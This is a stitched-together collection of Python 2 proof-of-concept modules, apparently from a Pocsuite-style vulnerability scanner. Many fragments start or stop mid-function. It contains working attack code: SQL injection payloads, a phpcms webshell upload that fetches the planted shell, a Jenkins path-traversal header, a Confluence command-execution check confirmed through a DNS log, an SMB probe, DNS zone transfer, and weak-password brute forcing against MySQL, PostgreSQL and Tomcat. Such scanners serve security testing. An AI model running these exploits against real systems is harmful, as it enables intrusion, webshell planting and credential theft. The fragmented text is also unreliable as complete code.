def _attack(self):
result = {}
self._verify()
def _verify(self):
result = {}
vulurl = "%s/?m=hotel.getHotelInfo" % self.url
payload = {"hotelId":"11 AND (SELECT 6261 FROM(SELECT COUNT(*),CONCAT(0x7e7e7e,(MID((IFNULL(CAST(MD5(3.14) AS CHAR),0x20)),1,50)),0x7e7e7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"}
resp = req.post(vulurl,data = payload,timeout =15)
re_result = re.findall(r'~~~(.*?)~~~', resp.content, re.S|re.I)
if re_result:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = vulurl
result['VerifyInfo']['Payload'] = payload
return self.parse_output(result)
def parse_output(self, result):
#parse output
output = Output(self)
if result:
output.success(result)
else:
output.fail('Internet nothing returned')
return output
register(TestPOC)
s.send(binascii.unhexlify(tree_connect_andx_request))
data = s.recv(1024)
all_id = data[28:36]
payload = "0000004aff534d422500000000180128000000000000000000000000%s1000000000ffffffff000000000000000000" \
"0000004a0000004a0002002300000007005c504950455c00" % all_id.encode('hex')
s.send(binascii.unhexlify(payload))
data = s.recv(1024)
s.close()
if "\x05\x02\x00\xc0" in data:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
result['VerifyInfo']['Payload'] = payload[:20]
result['VerifyInfo']['result'] = data[:20]
except Exception as e:
pass
return self.parse_attack(result)
def _attack(self):
return self._verify()
def parse_attack(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('Internet noting return')
return output
register(TestPOC)
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect(hostname,
port=int(port),
username=username,
password="",
pkey=None,
key_filename=keyfile)
stdin, stdout, stderr = client.exec_command(command)
cmd_output = stdout.read()
client.close()
return True if cmd_output == 'root' else False
except IOError:
logger.debug(
"Generate a keyfile for tool to bypass remote/local server credentials."
)
return False
except paramiko.SSHException as e:
logger.debug(
"TCPForwarding disabled on remote server can't connect. Not Vulnerable"
)
return False
except socket.error:
logger.debug("Unable to connect.")
return False
register(DemoPOC)
print '%s is vulnerable!' % testurl
return True
else:
print '没有发现关键字:successfully. '
return False
except Exception as e:
print '连接失败'
pass
return self.save_output(result)
#攻击模块
def _attack(self):
pass
#输出报告
def save_output(self, result):
#判断有无结果并输出
output = Output(self)
if result:
output.success(result)
else:
output.fail()
return output
#注册类
register(TomcatuploadPOC)
except:
#print e
pass
if vul_port.__len__() > 0:
result['VerifyInfo'] = {}
result['VerifyInfo']['url'] = self.url
result['VerifyInfo']['Payload'] = "port:" + str(vul_port)
print '[+]28 poc done'
return self.save_output(result)
#pass
# 攻击模块
def _attack(self):
return self._verify()
#pass
# 输出报告
def save_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail()
return output
# 注册类
register(HadoopPOC)
临时判断 , 有正确和误报时,对比提取特征解决误报
"""
#print r,type(r)
title = re.findall(r"<title>(.*)</title>", r.content)[0]
if 'Solr Admin' in title and 'Dashboard' in r.content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = vul_url
result['VerifyInfo']['Payload'] = Payload
else:
result = {}
print '[+]7 poc done'
return self.save_output(result)
#漏洞攻击
def _attack(self):
result = {}
# 攻击代码
return self._verify()
def save_output(self, result):
#判断有无结果并输出
output = Output(self)
if result:
output.success(result)
else:
output.fail()
return output
register(SolrPOC)
cmd = "ping {0}.{1}".format(self.BANNER, self.DOMAIN)
self._verify(template, cmd)
if self.dnslog_sucess(self.CEYE_URL):
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = target_url
return self.save_output(result)
# 输出报告
def save_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail()
return output
# 验证DNS已被解析,命令执行
def dnslog_sucess(self, url):
_resp = req.get(url)
d = _resp.json()
try:
name = d['data'][0]['name']
if self.BANNER in name:
return True
except Exception:
return False
# 注册类
register(ConfluenceRcePOC)
try:
resp = req.get(url=vul_url, timeout=3, verify=False)
if resp.headers[
'Content-Type'] and 'application/json' in resp.headers[
'Content-Type'] and len(resp.content) > 500:
result['VerifyInfo'] = {}
result['VerifyInfo']['url'] = vul_url
result['VerifyInfo']['Payload'] = 'path:/{}'.format(i)
break
except Exception as e:
pass
print '[+]58 poc done'
return self.save_output(result)
#攻击模块
def _attack(self):
pass
#输出报告
def save_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail()
return output
#注册类
register(ActuaorPOC)
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = vul_url
result['VerifyInfo']['Payload'] = vul_url
else:
print '[+] No Vulnerable found'
except Exception as e:
print e
pass
print '[+]44 poc done'
return self.save_output(result)
#攻击模块
def _attack(self):
result = {}
return self._verify()
#输出报告
def save_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail()
return output
#注册类
register(DNSPOC)
else:
print '[-]The X-Proxy-Cache is MISS.'
print '[-]Can not find the vuln.'
else:
print '[-]The header without X-Proxy-Cache.'
print '[-]Can not find the vuln.'
except Exception as e:
# return host
print e
return self.save_output(result)
#漏洞攻击
def _attack(self):
result = {}
# 攻击代码
return self._verify()
def save_output(self, result):
#判断有无结果并输出
output = Output(self)
if result:
output.success(result)
else:
output.fail()
return output
register(NginxPOC)
return self.save_output(result)
return self.save_output(result)
# 验证DNS已被解析,命令执行
def dnslog_sucess(self, url):
resp = req.get(url)
d = resp.json()
try:
name = d['data'][0]['name']
if self.BANNER in name:
return True
except Exception:
return False
# 攻击模块
def _attack(self):
return self._verify()
# 输出报告
def save_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail()
return output
# 注册类
register(NexusManagerPOC)
return True
else:
print '没有发现 :root: 特征字'
return False
except Exception as e:
print 'socket连接失败'
pass
sock.close()
return self.save_output(result)
#攻击模块
def _attack(self):
pass
#输出报告
def save_output(self, result):
#判断有无结果并输出
output = Output(self)
if result:
output.success(result)
else:
output.fail()
return output
#注册类
register(fastcgiPOC)
output.fail('Internet nothing returned')
return output
def query(self, ns):
nsaddr = self.resolve_a(ns)
try:
z = self.pull_zone(nsaddr)
except (exception.FormError, socket.error, EOFError):
print >> sys.stderr, "AXFR failed\n"
return None
else:
return z
def resolve_a(self, name):
"""Pulls down an A record for a name"""
nsres = resolver.query(name, 'A')
return str(nsres[0])
def pull_zone(self, nameserver):
"""Sends the domain transfer request"""
q = query.xfr(nameserver, self.domain, relativize=False, timeout=2)
zone = ""
for m in q:
zone += str(m)
if not zone:
raise EOFError
return zone
register(DNS_transforPoc)
references = ['https://www.openssl.org/~bodo/ssl-poodle.pdf']
name = 'SSL 3.0 POODLE攻击信息泄露漏洞 POC'
appPowerLink = 'https://tools.ietf.org/html/rfc6101'
appName = 'SSL'
appVersion = '3.0'
vulType = 'Information Disclosure'
desc = '''
SSL 3.0使用的CBC块加密的实现存在漏洞,攻击者可以成功破解SSL连接的加密信息,比如获取用户cookie数据
'''
samples = ['www.baidu.com', 'taobao.com']
def _verify(self):
result = {}
output = Output(self)
target_ip = url2ip(self.url)
url = urlparse.urlparse(self.url)
port = url.port or 443
if check_poodle(target_ip, port):
output.success(result)
else:
output.fail('Not support SSLv3 connection. Not Vulnerable')
return output
def _attack(self):
return self._verify()
register(SSLv3_POODLE)
u,
pwd,
'mysql',
connect_timeout=_conn_timeout)
conn.close()
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = vul_ip
result['VerifyInfo']['Payload'] = u + ":" + pwd
return self.save_output(result)
except Exception as e:
pass
return self.save_output(result)
# 攻击模块
def _attack(self):
return self._verify()
#pass
# 输出报告
def save_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail()
return output
# 注册类
register(MYSQLPOC)
print(message)
result['VerifyInfo'] = {}
result['VerifyInfo']['url'] = ip
result['VerifyInfo']['Payload'] = pay
return True
else:
print '没有发现关键字.'
return False
return self.save_output(result)
#攻击模块
def _attack(self):
pass
#输出报告
def save_output(self, result):
#判断有无结果并输出
output = Output(self)
if result:
output.success(result)
else:
output.fail()
return output
#注册类
register(iis_RCE_POC)
# print check
if response:
for x in check:
if salt in check[x]:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
result['VerifyInfo']['Payload'] = 'Host: ' + salt
break
else:
result = {}
print '[+]25 poc done'
return self.save_output(result)
#漏洞攻击
def _attack(self):
result = {}
# 攻击代码
return self._verify()
def save_output(self, result):
#判断有无结果并输出
output = Output(self)
if result:
output.success(result)
else:
output.fail()
return output
register(HTTPPOC)
break
else:
break
except:
return 0
return 0
def _attack(self):
'''attack mode'''
return self._verify()
def _verify(self):
'''verify mode'''
result = {}
# self.url = self.url
checkcode = self.TestingCms(self.url)
if checkcode == 1:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
return self.parse_output(result)
def parse_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('Internet nothing returned')
return output
register(DedeShortNamePOC)
s.connect((ip, port))
print('Rsync未授权访问')
message = 'Rsync 873端口 未授权访问'
result['VerifyInfo'] = {}
result['VerifyInfo']['url'] = ip
result['VerifyInfo']['Payload'] = message
except Exception as e:
print(e)
s.close()
print '[+]30 poc done'
return self.save_output(result)
def save_output(self, result):
#判断有无结果并输出
output = Output(self)
if result:
output.success(result)
else:
output.fail()
return output
#攻击模块
def _attack(self):
result = {}
# 攻击代码
return self._verify()
#注册类
register(rsyncPOC)
print '当前 ' + u + ":" + p
reponse = req.get(vul_url, timeout=5, headers=header)
if ("Tomcat Web Application Manager" in reponse.text):
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = vul_url
result['VerifyInfo']['Payload'] = u + ":" + p
except Exception as e:
print e
pass
print '[+]34 poc done'
return self.save_output(result)
#攻击模块
def _attack(self):
pass
#输出报告
def save_output(self, result):
#判断有无结果并输出
output = Output(self)
if result:
output.success(result)
else:
output.fail()
return output
#注册类
register(TomcatPOC)
def test_register_poc(self):
register(test_class)
assert kb.registered_pocs is not None
assert test_class.__module__.split('.')[-1] in kb.registered_pocs
'xajax':
'LiveMessage',
'xajaxargs[0][name]':
"1',(SELECT 1 FROM (select count(*),concat("
"floor(rand(0)*2),(select md5(233)))a from "
"information_schema.tables group by a)b),"
"'','','','1','127.0.0.1','2') #"
}
response = req.post(vul_url, data=payload, timeout=30).content
if 'e165421110ba03099a1c0393373c5b43' in response:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = vul_url
return self.parse_attack(result)
def _attack(self):
return self._verify()
def parse_attack(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail("Internet nothing returned")
return output
register(CmsEasyPoc)
"""
临时判断 , 有正确和误报时,对比提取特征解决误报
"""
#print r,type(r)
if "Druid Console" in title:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = vul_url
result['VerifyInfo']['Payload'] = vul_url
else:
pass
print '[+]8 poc done'
return self.save_output(result)
#漏洞攻击
def _attack(self):
result = {}
# 攻击代码
return self._verify()
def save_output(self, result):
#判断有无结果并输出
output = Output(self)
if result:
output.success(result)
else:
output.fail()
return output
register(DruidPOC)
sk.connect((_host, _port))
except Exception:
return self.save_output(result)
sk.close()
resulta = checkUsername("rootasdf23", _host)
if (resulta == "1"):
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = _host
result['VerifyInfo']['Payload'] = "存在ssh 用户枚举".decode("utf8")
return self.save_output(result)
#攻击模块
def _attack(self):
result = {}
return self._verify()
#输出报告
def save_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail()
return output
#注册类
register(SS1HPOC)
text = req.get(url,timeout=4).text
if ("index.php" in text and "robots.txt" in text) or ("Configuration File" in text):
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = vul_ip
result['VerifyInfo']['Payload'] = p
return self.save_output(result)
except Exception as e:
print e
pass
return self.save_output(result)
# 攻击模块
def _attack(self):
return self._verify()
#pass
# 输出报告
def save_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail()
return output
# 注册类
register(webLogicPOC)
result['VerifyInfo']['Payload'] = ip + 'fastcgi read file vul'
return self.save_output(result)
except:
print '连接失败'
pass
sock.close()
# print '-' * 18 + '\n'
print data
# print '-' * 18 + '\n'
#攻击模块
def _attack(self):
pass
#输出报告
def save_output(self, result):
#判断有无结果并输出
output = Output(self)
if result:
output.success(result)
else:
output.fail()
return output
#注册类
register(MSPOC)
#如果有结果则输出
if len(payload_dict) != 0 :
for i in payload_dict:
if payload_dict.values().count(payload_dict[i]) == 1:
final_url.append(i)
print final_url
if ((len(final_url)) != 0 and (len(final_url)) <15):
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = vul_url
result['VerifyInfo']['Payload'] = str(final_url)
print '[+]11 poc done'
return self.save_output(result)
#漏洞攻击
def _attack(self):
result = {}
# 攻击代码
return self._verify()
def save_output(self, result):
#判断有无结果并输出
output = Output(self)
if result:
output.success(result)
else:
output.fail()
return output
register(FilefindPOC)
ret = ssltest(_host, _port)
# print ret
if ret == "check":
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = host
result['VerifyInfo']['Payload'] = payload
else:
pass
except:
pass
print '[+]20 poc done'
return self.save_output(result)
#漏洞攻击
def _attack(self):
result = {}
# 攻击代码
return self._verify()
def save_output(self, result):
#判断有无结果并输出
output = Output(self)
if result:
output.success(result)
else:
output.fail()
return output
register(OpensslPOC)
"dosubmit": "1",
"protocol": "",
}
match = "img src=(.+?)(/[0-9]{4}/[0-9]{4}/)([0-9]+?).php"
resp = req.post(url, data=data)
shell = re.findall(match, resp.text)
shellinfo = ''.join(shell[0]) + ".php"
if shell:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
shell_resp = req.get(shellinfo)
if shell_resp.status_code == 200:
result['VerifyInfo']['webshell'] = shellinfo
return self.parse_attack(result)
_attack = _verify
def parse_attack(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('Internet nothing returned')
return output
def _attack(self):
return self._verify()
register(phpcms_getshll)
header = {'Accept-Language': ('../' * BACKDIR_COUNT) + file_name}
try:
vulurl = vul_ip + '/plugin/credentials/.ini'
vulurltest = req.get(vulurl, headers=header)
if "MPEGVideo" in vulurltest.text:
if vulurltest.text.find('version'):
result['VerifyInfo'] = {}
result['VerifyInfo']['url'] = vulurl
result['VerifyInfo']['Payload'] = header
except Exception as e:
pass
return self.save_output(result)
# 攻击模块
def _attack(self):
return self._verify()
# 输出报告
def save_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail()
return output
# 注册类
register(JenkinsPOC)
message = u' {} 5432端口 Postgresql 存在弱口令: postgres {}'.format(
_host, pwd)
print "有弱口令漏洞"
conn.close()
result['VerifyInfo'] = {}
result['VerifyInfo']['url'] = self.url
result['VerifyInfo']['Payload'] = message
break
except Exception as e:
print e
print '[+]29 poc done'
return self.save_output(result)
#攻击模块
def _attack(self):
return self._verify()
#输出报告
def save_output(self, result):
#判断有无结果并输出
output = Output(self)
if result:
output.success(result)
else:
output.fail()
return output
#注册类
register(PGPOC)
